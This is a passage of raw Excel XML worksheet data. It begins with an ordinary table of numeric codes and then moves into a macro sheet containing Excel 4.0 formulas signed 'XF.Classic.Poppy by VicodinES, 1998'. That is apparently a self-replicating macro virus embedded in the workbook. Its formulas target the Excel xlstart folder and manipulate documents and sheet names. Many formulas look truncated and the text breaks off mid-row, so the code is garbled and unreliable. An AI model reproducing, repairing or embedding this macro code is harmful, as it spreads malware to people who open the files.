      <c r="B257" s="38" t="s">
        <v>535</v>
      </c>
      <c r="C257" s="24">
        <v>487862</v>
      </c>
      <c r="D257" s="3" t="s">
        <v>536</v>
      </c>
      <c r="E257" s="24">
        <v>487862</v>
      </c>
      <c r="F257" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="258" spans="1:6" ht="19.5" customHeight="1">
      <c r="A258" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B258" s="38" t="s">
        <v>537</v>
      </c>
      <c r="C258" s="24">
        <v>487862</v>
      </c>
      <c r="D258" s="3" t="s">
        <v>538</v>
      </c>
      <c r="E258" s="24">
        <v>487862</v>
      </c>
      <c r="F258" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="259" spans="1:6" ht="19.5" customHeight="1">
      <c r="A259" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B259" s="38" t="s">
        <v>539</v>
      </c>
      <c r="C259" s="24">
        <v>487863</v>
      </c>
      <c r="D259" s="3" t="s">
        <v>540</v>
      </c>
      <c r="E259" s="24">
        <v>487863</v>
      </c>
      <c r="F259" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="260" spans="1:6" ht="19.5" customHeight="1">
      <c r="A260" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B260" s="38" t="s">
        <v>541</v>
      </c>
      <c r="C260" s="24">
        <v>487860</v>
      </c>
      <c r="D260" s="3" t="s">
        <v>542</v>
      </c>
      <c r="E260" s="24">
        <v>487860</v>
      </c>
      <c r="F260" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="261" spans="1:6" ht="19.5" customHeight="1">
      <c r="A261" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B261" s="38" t="s">
        <v>543</v>
      </c>
      <c r="C261" s="24"/>
      <c r="D261" s="3" t="s">
        <v>544</v>
      </c>
      <c r="E261" s="24"/>
      <c r="F261" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="262" spans="1:6" ht="19.5" customHeight="1">
      <c r="A262" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B262" s="38" t="s">
        <v>545</v>
      </c>
      <c r="C262" s="24">
        <v>487851</v>
      </c>
      <c r="D262" s="3" t="s">
        <v>546</v>
      </c>
      <c r="E262" s="24">
        <v>487851</v>
      </c>
      <c r="F262" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="263" spans="1:6" ht="19.5" customHeight="1">
      <c r="A263" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B263" s="38" t="s">
        <v>547</v>
      </c>
      <c r="C263" s="24">
        <v>487852</v>
      </c>
      <c r="D263" s="3" t="s">
        <v>548</v>
      </c>
      <c r="E263" s="24">
        <v>487852</v>
      </c>
      <c r="F263" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="264" spans="1:6" ht="19.5" customHeight="1">
      <c r="A264" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B264" s="38" t="s">
        <v>549</v>
      </c>
      <c r="C264" s="24">
        <v>487853</v>
      </c>
      <c r="D264" s="3" t="s">
        <v>550</v>
      </c>
      <c r="E264" s="24">
        <v>487853</v>
      </c>
      <c r="F264" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="265" spans="1:6" ht="19.5" customHeight="1">
      <c r="A265" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B265" s="38" t="s">
        <v>551</v>
      </c>
      <c r="C265" s="24">
        <v>487854</v>
      </c>
      <c r="D265" s="3" t="s">
        <v>552</v>
      </c>
      <c r="E265" s="24">
        <v>487854</v>
      </c>
      <c r="F265" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="266" spans="1:6" ht="19.5" customHeight="1">
      <c r="A266" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B266" s="38" t="s">
        <v>553</v>
      </c>
      <c r="C266" s="24">
        <v>487854</v>
      </c>
      <c r="D266" s="3" t="s">
        <v>554</v>
      </c>
      <c r="E266" s="24">
        <v>487854</v>
      </c>
      <c r="F266" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="267" spans="1:6" ht="19.5" customHeight="1">
      <c r="A267" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B267" s="38" t="s">
        <v>555</v>
      </c>
      <c r="C267" s="24">
        <v>487853</v>
      </c>
      <c r="D267" s="3" t="s">
        <v>556</v>
      </c>
      <c r="E267" s="24">
        <v>487853</v>
      </c>
      <c r="F267" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="268" spans="1:6" ht="19.5" customHeight="1">
      <c r="A268" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B268" s="38" t="s">
        <v>557</v>
      </c>
      <c r="C268" s="24">
        <v>487854</v>
      </c>
      <c r="D268" s="3" t="s">
        <v>558</v>
      </c>
      <c r="E268" s="24">
        <v>487854</v>
      </c>
      <c r="F268" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="269" spans="1:6" ht="19.5" customHeight="1">
      <c r="A269" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B269" s="38" t="s">
        <v>559</v>
      </c>
      <c r="C269" s="24">
        <v>487850</v>
      </c>
      <c r="D269" s="3" t="s">
        <v>560</v>
      </c>
      <c r="E269" s="24">
        <v>487850</v>
      </c>
      <c r="F269" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="270" spans="1:6" ht="19.5" customHeight="1">
      <c r="A270" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B270" s="38" t="s">
        <v>561</v>
      </c>
      <c r="C270" s="24"/>
      <c r="D270" s="3" t="s">
        <v>562</v>
      </c>
      <c r="E270" s="24"/>
      <c r="F270" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="271" spans="1:6" ht="19.5" customHeight="1">
      <c r="A271" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B271" s="38" t="s">
        <v>563</v>
      </c>
      <c r="C271" s="24">
        <v>487921</v>
      </c>
      <c r="D271" s="3" t="s">
        <v>564</v>
      </c>
      <c r="E271" s="24">
        <v>487921</v>
      </c>
      <c r="F271" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="272" spans="1:6" ht="19.5" customHeight="1">
      <c r="A272" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B272" s="38" t="s">
        <v>565</v>
      </c>
      <c r="C272" s="24">
        <v>487922</v>
      </c>
      <c r="D272" s="3" t="s">
        <v>566</v>
      </c>
      <c r="E272" s="24">
        <v>487922</v>
      </c>
      <c r="F272" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="273" spans="1:6" ht="19.5" customHeight="1">
      <c r="A273" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B273" s="38" t="s">
        <v>567</v>
      </c>
      <c r="C273" s="24">
        <v>487922</v>
      </c>
      <c r="D273" s="3" t="s">
        <v>568</v>
      </c>
      <c r="E273" s="24">
        <v>487922</v>
      </c>
      <c r="F273" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="274" spans="1:6" ht="19.5" customHeight="1">
      <c r="A274" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B274" s="38" t="s">
        <v>569</v>
      </c>
      <c r="C274" s="24">
        <v>487922</v>
      </c>
      <c r="D274" s="3" t="s">
        <v>570</v>
      </c>
      <c r="E274" s="24">
        <v>487922</v>
      </c>
      <c r="F274" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="275" spans="1:6" ht="19.5" customHeight="1">
      <c r="A275" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B275" s="38" t="s">
        <v>571</v>
      </c>
      <c r="C275" s="24">
        <v>487922</v>
      </c>
      <c r="D275" s="3" t="s">
        <v>572</v>
      </c>
      <c r="E275" s="24">
        <v>487922</v>
      </c>
      <c r="F275" s="27" t="s">
        <v>166</v>
      </c>
    </row>
    <row r="276" spans="1:6" ht="19.5" customHeight="1">
      <c r="A276" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B276" s="38" t="s">
        <v>573</v>
      </c>
      <c r="C276" s="24">
        <v>487921</v>
      </c>
      <c r="D276" s="3" t="s">
        <v>574</v>
      </c>
      <c r="E276" s="24">
        <v>487921</v>
      </c>
      <c r="F276" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="277" spans="1:6" ht="19.5" customHeight="1">
      <c r="A277" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B277" s="38" t="s">
        <v>575</v>
      </c>
      <c r="C277" s="24">
        <v>487922</v>
      </c>
      <c r="D277" s="3" t="s">
        <v>576</v>
      </c>
      <c r="E277" s="24">
        <v>487922</v>
      </c>
      <c r="F277" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="278" spans="1:6" ht="19.5" customHeight="1">
      <c r="A278" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B278" s="38" t="s">
        <v>577</v>
      </c>
      <c r="C278" s="24">
        <v>487921</v>
      </c>
      <c r="D278" s="3" t="s">
        <v>578</v>
      </c>
      <c r="E278" s="24">
        <v>487921</v>
      </c>
      <c r="F278" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="279" spans="1:6" ht="19.5" customHeight="1">
      <c r="A279" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B279" s="38" t="s">
        <v>579</v>
      </c>
      <c r="C279" s="24">
        <v>487920</v>
      </c>
      <c r="D279" s="3" t="s">
        <v>580</v>
      </c>
      <c r="E279" s="24">
        <v>487920</v>
      </c>
      <c r="F279" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="280" spans="1:6" ht="19.5" customHeight="1">
      <c r="A280" s="37" t="s">
        <v>147</v>
      </c>
      <c r="B280" s="38" t="s">
        <v>581</v>
      </c>
      <c r="C280" s="24">
        <v>487840</v>
      </c>
      <c r="D280" s="3" t="s">
        <v>582</v>
      </c>
      <c r="E280" s="24">
        <v>487840</v>
      </c>
      <c r="F280" s="27" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="281" spans="1:6" ht="19.5" customHeight="1">
      <c r="A281" s="37" t="s">
        <v>583</v>
      </c>
      <c r="B281" s="38" t="s">
        <v>584</v>
      </c>
      <c r="C281" s="31">
        <v>570757</v>
      </c>
      <c r="D281" s="38" t="s">
        <v>585</v>
      </c>
      <c r="E281" s="31">
        <v>570757</v>
      </c>
      <c r="F281" s="39" t="s">
        <v>586</v>
      </c>
    </row>
    <row r="282" spans="1:6" ht="19.5" customHeight="1">
      <c r="A282" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B282" s="38" t="s">
        <v>587</v>
      </c>
      <c r="C282" s="31">
        <v>570756</v>
      </c>
      <c r="D282" s="38" t="s">
        <v>588</v>
      </c>
      <c r="E282" s="31">
        <v>570756</v>
      </c>
      <c r="F282" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="283" spans="1:6" ht="19.5" customHeight="1">
      <c r="A283" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B283" s="38" t="s">
        <v>589</v>
      </c>
      <c r="C283" s="31">
        <v>570755</v>
      </c>
      <c r="D283" s="38" t="s">
        <v>590</v>
      </c>
      <c r="E283" s="31">
        <v>570755</v>
      </c>
      <c r="F283" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="284" spans="1:6" ht="19.5" customHeight="1">
      <c r="A284" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B284" s="38" t="s">
        <v>591</v>
      </c>
      <c r="C284" s="31">
        <v>570758</v>
      </c>
      <c r="D284" s="38" t="s">
        <v>592</v>
      </c>
      <c r="E284" s="31">
        <v>570758</v>
      </c>
      <c r="F284" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="285" spans="1:6" ht="19.5" customHeight="1">
      <c r="A285" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B285" s="38" t="s">
        <v>593</v>
      </c>
      <c r="C285" s="31">
        <v>570965</v>
      </c>
      <c r="D285" s="38" t="s">
        <v>594</v>
      </c>
      <c r="E285" s="31">
        <v>570965</v>
      </c>
      <c r="F285" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="286" spans="1:6" ht="19.5" customHeight="1">
      <c r="A286" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B286" s="38" t="s">
        <v>595</v>
      </c>
      <c r="C286" s="31">
        <v>570966</v>
      </c>
      <c r="D286" s="38" t="s">
        <v>596</v>
      </c>
      <c r="E286" s="31">
        <v>570966</v>
      </c>
      <c r="F286" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="287" spans="1:6" ht="19.5" customHeight="1">
      <c r="A287" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B287" s="38" t="s">
        <v>597</v>
      </c>
      <c r="C287" s="31">
        <v>570967</v>
      </c>
      <c r="D287" s="38" t="s">
        <v>598</v>
      </c>
      <c r="E287" s="31">
        <v>570967</v>
      </c>
      <c r="F287" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="288" spans="1:6" ht="19.5" customHeight="1">
      <c r="A288" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B288" s="38" t="s">
        <v>599</v>
      </c>
      <c r="C288" s="31">
        <v>570968</v>
      </c>
      <c r="D288" s="38" t="s">
        <v>600</v>
      </c>
      <c r="E288" s="31">
        <v>570968</v>
      </c>
      <c r="F288" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="289" spans="1:6" ht="19.5" customHeight="1">
      <c r="A289" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B289" s="38" t="s">
        <v>601</v>
      </c>
      <c r="C289" s="31">
        <v>570969</v>
      </c>
      <c r="D289" s="38" t="s">
        <v>602</v>
      </c>
      <c r="E289" s="31">
        <v>570969</v>
      </c>
      <c r="F289" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="290" spans="1:6" ht="19.5" customHeight="1">
      <c r="A290" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B290" s="38" t="s">
        <v>603</v>
      </c>
      <c r="C290" s="31">
        <v>570091</v>
      </c>
      <c r="D290" s="38" t="s">
        <v>604</v>
      </c>
      <c r="E290" s="31">
        <v>570091</v>
      </c>
      <c r="F290" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="291" spans="1:6" ht="19.5" customHeight="1">
      <c r="A291" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B291" s="38" t="s">
        <v>605</v>
      </c>
      <c r="C291" s="31">
        <v>570970</v>
      </c>
      <c r="D291" s="38" t="s">
        <v>45</v>
      </c>
      <c r="E291" s="31">
        <v>570970</v>
      </c>
      <c r="F291" s="39"/>
    </row>
    <row r="292" spans="1:6" ht="19.5" customHeight="1">
      <c r="A292" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B292" s="38" t="s">
        <v>606</v>
      </c>
      <c r="C292" s="31">
        <v>570971</v>
      </c>
      <c r="D292" s="38" t="s">
        <v>607</v>
      </c>
      <c r="E292" s="31">
        <v>570971</v>
      </c>
      <c r="F292" s="39"/>
    </row>
    <row r="293" spans="1:6" ht="19.5" customHeight="1">
      <c r="A293" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B293" s="38" t="s">
        <v>608</v>
      </c>
      <c r="C293" s="31">
        <v>570092</v>
      </c>
      <c r="D293" s="38" t="s">
        <v>46</v>
      </c>
      <c r="E293" s="31">
        <v>570092</v>
      </c>
      <c r="F293" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="294" spans="1:6" ht="19.5" customHeight="1">
      <c r="A294" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B294" s="38" t="s">
        <v>609</v>
      </c>
      <c r="C294" s="31">
        <v>570701</v>
      </c>
      <c r="D294" s="38" t="s">
        <v>610</v>
      </c>
      <c r="E294" s="31">
        <v>570701</v>
      </c>
      <c r="F294" s="39" t="s">
        <v>611</v>
      </c>
    </row>
    <row r="295" spans="1:6" ht="19.5" customHeight="1">
      <c r="A295" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B295" s="38" t="s">
        <v>612</v>
      </c>
      <c r="C295" s="31">
        <v>570121</v>
      </c>
      <c r="D295" s="38" t="s">
        <v>613</v>
      </c>
      <c r="E295" s="31">
        <v>570121</v>
      </c>
      <c r="F295" s="39" t="s">
        <v>614</v>
      </c>
    </row>
    <row r="296" spans="1:6" ht="19.5" customHeight="1">
      <c r="A296" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B296" s="38" t="s">
        <v>47</v>
      </c>
      <c r="C296" s="31">
        <v>570122</v>
      </c>
      <c r="D296" s="38" t="s">
        <v>48</v>
      </c>
      <c r="E296" s="31">
        <v>570122</v>
      </c>
      <c r="F296" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="297" spans="1:6" ht="19.5" customHeight="1">
      <c r="A297" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B297" s="38" t="s">
        <v>615</v>
      </c>
      <c r="C297" s="31">
        <v>570988</v>
      </c>
      <c r="D297" s="38" t="s">
        <v>616</v>
      </c>
      <c r="E297" s="31">
        <v>570988</v>
      </c>
      <c r="F297" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="298" spans="1:6" ht="19.5" customHeight="1">
      <c r="A298" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B298" s="38" t="s">
        <v>617</v>
      </c>
      <c r="C298" s="31">
        <v>570989</v>
      </c>
      <c r="D298" s="38" t="s">
        <v>618</v>
      </c>
      <c r="E298" s="31">
        <v>570989</v>
      </c>
      <c r="F298" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="299" spans="1:6" ht="19.5" customHeight="1">
      <c r="A299" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B299" s="38" t="s">
        <v>49</v>
      </c>
      <c r="C299" s="31">
        <v>570123</v>
      </c>
      <c r="D299" s="38" t="s">
        <v>50</v>
      </c>
      <c r="E299" s="31">
        <v>570123</v>
      </c>
      <c r="F299" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="300" spans="1:6" ht="19.5" customHeight="1">
      <c r="A300" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B300" s="38" t="s">
        <v>619</v>
      </c>
      <c r="C300" s="31">
        <v>570990</v>
      </c>
      <c r="D300" s="38" t="s">
        <v>620</v>
      </c>
      <c r="E300" s="31">
        <v>570990</v>
      </c>
      <c r="F300" s="39" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="301" spans="1:6" ht="19.5" customHeight="1">
      <c r="A301" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B301" s="38" t="s">
        <v>621</v>
      </c>
      <c r="C301" s="31">
        <v>570991</v>
      </c>
      <c r="D301" s="38" t="s">
        <v>622</v>
      </c>
      <c r="E301" s="31">
        <v>570991</v>
      </c>
      <c r="F301" s="39"/>
    </row>
    <row r="302" spans="1:6" ht="19.5" customHeight="1">
      <c r="A302" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B302" s="38" t="s">
        <v>623</v>
      </c>
      <c r="C302" s="31">
        <v>570992</v>
      </c>
      <c r="D302" s="38" t="s">
        <v>624</v>
      </c>
      <c r="E302" s="31">
        <v>570992</v>
      </c>
      <c r="F302" s="39"/>
    </row>
    <row r="303" spans="1:6" ht="19.5" customHeight="1">
      <c r="A303" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B303" s="38" t="s">
        <v>625</v>
      </c>
      <c r="C303" s="31">
        <v>570021</v>
      </c>
      <c r="D303" s="38" t="s">
        <v>626</v>
      </c>
      <c r="E303" s="31">
        <v>570021</v>
      </c>
      <c r="F303" s="39"/>
    </row>
    <row r="304" spans="1:6" ht="19.5" customHeight="1">
      <c r="A304" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B304" s="38" t="s">
        <v>0</v>
      </c>
      <c r="C304" s="31">
        <v>570993</v>
      </c>
      <c r="D304" s="38" t="s">
        <v>1</v>
      </c>
      <c r="E304" s="31">
        <v>570993</v>
      </c>
      <c r="F304" s="39"/>
    </row>
    <row r="305" spans="1:6" ht="19.5" customHeight="1">
      <c r="A305" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B305" s="38" t="s">
        <v>2</v>
      </c>
      <c r="C305" s="31">
        <v>570994</v>
      </c>
      <c r="D305" s="38" t="s">
        <v>3</v>
      </c>
      <c r="E305" s="31">
        <v>570994</v>
      </c>
      <c r="F305" s="39"/>
    </row>
    <row r="306" spans="1:6" ht="19.5" customHeight="1">
      <c r="A306" s="37" t="s">
        <v>67</v>
      </c>
      <c r="B306" s="38" t="s">
        <v>4</v>
      </c>
      <c r="C306" s="31">
        <v>570995</v>
      </c>
      <c r="D306" s="38" t="s">
        <v>5</v>
      </c>
      <c r="E306" s="31">
        <v>570995</v>
      </c>
      <c r="F306" s="39"/>
    </row>
    <row r="307" spans="1:6" ht="19.5" customHeight="1">
      <c r="A307" s="40" t="s">
        <v>67</v>
      </c>
      <c r="B307" s="41" t="s">
        <v>51</v>
      </c>
      <c r="C307" s="30">
        <v>570022</v>
      </c>
      <c r="D307" s="41" t="s">
        <v>52</v>
      </c>
      <c r="E307" s="30">
        <v>570022</v>
      </c>
      <c r="F307" s="42" t="s">
        <v>67</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="12">
    <mergeCell ref="E47:E48"/>
    <mergeCell ref="F47:F48"/>
    <mergeCell ref="D65:D66"/>
    <mergeCell ref="E65:E66"/>
    <mergeCell ref="F65:F66"/>
    <mergeCell ref="D47:D48"/>
    <mergeCell ref="A1:F1"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="B3:C3"/>
    <mergeCell ref="D3:E3"/>
    <mergeCell ref="F3:F4"/>
    <mergeCell ref="E2:F2"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="0.19" right="0.18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2" sqref="C22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"/>
  <cols>
    <col min="1" max="1" width="29.8515625" style="6" customWidth="1"/>
    <col min="2" max="2" width="1.28515625" style="6" customWidth="1"/>
    <col min="3" max="3" width="32.140625" style="6" customWidth="1"/>
    <col min="4" max="16384" width="9.140625" style="6" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="12.75">
      <c r="A1" s="5" t="s">
        <v>17</v>
      </c>
      <c r="C1" s="6" t="b">
        <f>"XL4Poppy"</f>
        <v>0</v>
      </c>
    </row>
    <row r="2" ht="13.5" thickBot="1">
      <c r="A2" s="5" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="3" spans="1:3" ht="13.5" thickBot="1">
      <c r="A3" s="7" t="s">
        <v>19</v>
      </c>
      <c r="C3" s="8" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="4" spans="1:3" ht="12.75">
      <c r="A4" s="7" t="e">
        <v>#N/A</v>
      </c>
      <c r="C4" s="9" t="b">
        <f>C18</f>
        <v>0</v>
      </c>
    </row>
    <row r="5" ht="12.75">
      <c r="C5" s="9" t="b">
        <f>TRUE,</f>
        <v>0</v>
      </c>
    </row>
    <row r="6" ht="13.5" thickBot="1">
      <c r="C6" s="9" t="b">
        <f>IF(A4=3)</f>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:3" ht="12.75">
      <c r="A7" s="10" t="s">
        <v>21</v>
      </c>
      <c r="C7" s="9" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:3" ht="12.75">
      <c r="A8" s="11" t="s">
        <v>22</v>
      </c>
      <c r="C8" s="9" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:3" ht="12.75">
      <c r="A9" s="12" t="s">
        <v>23</v>
      </c>
      <c r="C9" s="9" t="b">
        <f>FALSE</f>
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:3" ht="12.75">
      <c r="A10" s="11" t="s">
        <v>24</v>
      </c>
      <c r="C10" s="9" t="b">
        <f>A21</f>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:3" ht="13.5" thickBot="1">
      <c r="A11" s="13" t="s">
        <v>25</v>
      </c>
      <c r="C11" s="9" t="b">
        <f>"6:30:00 PM","Hello"</f>
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="12.75">
      <c r="C12" s="9" t="b">
        <f>"6:30:00 AM","Morning"</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="13.5" thickBot="1">
      <c r="C13" s="9" t="b">
        <f>,"Poppy",TRUE</f>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:3" ht="13.5" thickBot="1">
      <c r="A14" s="8" t="s">
        <v>26</v>
      </c>
      <c r="C14" s="14" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="15" ht="12.75">
      <c r="A15" s="9" t="b">
        <f>"XF.Classic.Poppy by VicodinES",2</f>
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="13.5" thickBot="1">
      <c r="A16" s="9" t="b">
        <f>"ⓒ 1998 The Narkotic Network",2</f>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:3" ht="13.5" thickBot="1">
      <c r="A17" s="14" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C17" s="8" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="18" ht="12.75">
      <c r="C18" s="9" t="b">
        <f>$A$3(GET.WORKSPACE(32)&amp;"\xlstart\Book1.")</f>
        <v>0</v>
      </c>
    </row>
    <row r="19" ht="12.75">
      <c r="C19" s="9" t="b">
        <f>"Document_array",</f>
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:3" ht="12.75">
      <c r="A20" s="15" t="s">
        <v>28</v>
      </c>
      <c r="C20" s="9" t="b">
        <f>$A$1INDEX(,2)</f>
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:3" ht="12.75">
      <c r="A21" s="16" t="e">
        <f>IF(A3="Book1.",0,99)</f>
        <v>#N/A</v>
      </c>
      <c r="C21" s="9" t="b">
        <f>$A$2INDEX(,1)</f>
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:3" ht="12.75">
      <c r="A22" s="9" t="b">
        <f>TRUE,</f>
        <v>0</v>
      </c>
      <c r="C22" s="9" t="b">
        <f>$A$4GET.DOCUMENT(3,"["&amp;A1&amp;"]"&amp;"XL4Poppy")</f>
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:3" ht="12.75">
      <c r="A23" s="9" t="b">
        <f>IF(A21=0)</f>
        <v>0</v>
      </c>
      <c r="C23" s="14" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="24" ht="12.75">
      <c r="A24" s="9" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="12.75">
      <c r="A25" s="9" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:3" ht="13.5" thickBot="1">
      <c r="A26" s="9" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C26" s="17" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="27" spans="1:3" ht="12.75">
      <c r="A27" s="9" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C27" s="9" t="b">
        <f>C19</f>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:3" ht="12.75">
      <c r="A28" s="9" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C28" s="9" t="b">
        <f>TRUE,</f>
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:3" ht="12.75">
      <c r="A29" s="9" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C29" s="9" t="b">
        <f>IF(A4=3)</f>
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:3" ht="12.75">
      <c r="A30" s="9" t="b">
        <f>C18</f>
        <v>0</v>
      </c>
      <c r="C30" s="9" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:3" ht="12.75">
      <c r="A31" s="9" t="b">
        <f>"XL4Poppy",A1</f>
        <v>0</v>
      </c>
      <c r="C31" s="9" t="b">
        <f>FALSE</f>
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:3" ht="12.75">
      <c r="A32" s="9" t="b">
        <f>"Sheet3","Sheet99"</f>
        <v>0</v>
      </c>
      <c r="C32" s="9" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:3" ht="12.75">
      <c r="A33" s="9" t="b">
        <f>"Sheet1","Sheet3"</f>
        <v>0</v>
      </c>
      <c r="C33" s="9" t="b">
        <f>C19</f>
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:3" ht="12.75">
      <c r="A34" s="9" t="b">
        <f>"Sheet99","Sheet1"</f>
        <v>0</v>
      </c>
      <c r="C34" s="9" t="b">
        <f>"XL4Poppy",A1</f>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:3" ht="12.75">
      <c r="A35" s="9" t="b">
        <f>TRUE,,"VicodinES",TRUE</f>
        <v>0</v>
      </c>
      <c r="C35" s="9" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:3" ht="12.75">
      <c r="A36" s="9" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C36" s="14" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="37" ht="12.75">
      <c r="A37" s="9" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="12.75">
      <c r="A38" s="9" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:3" ht="12.75">
      <c r="A39" s="9" t="b">
        <f>A3</f>
        <v>0</v>
      </c>
      <c r="C39" s="16" t="b">
        <f>"XF.Classic.Poppy"</f>
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:3" ht="12.75">
      <c r="A40" s="9" t="b">
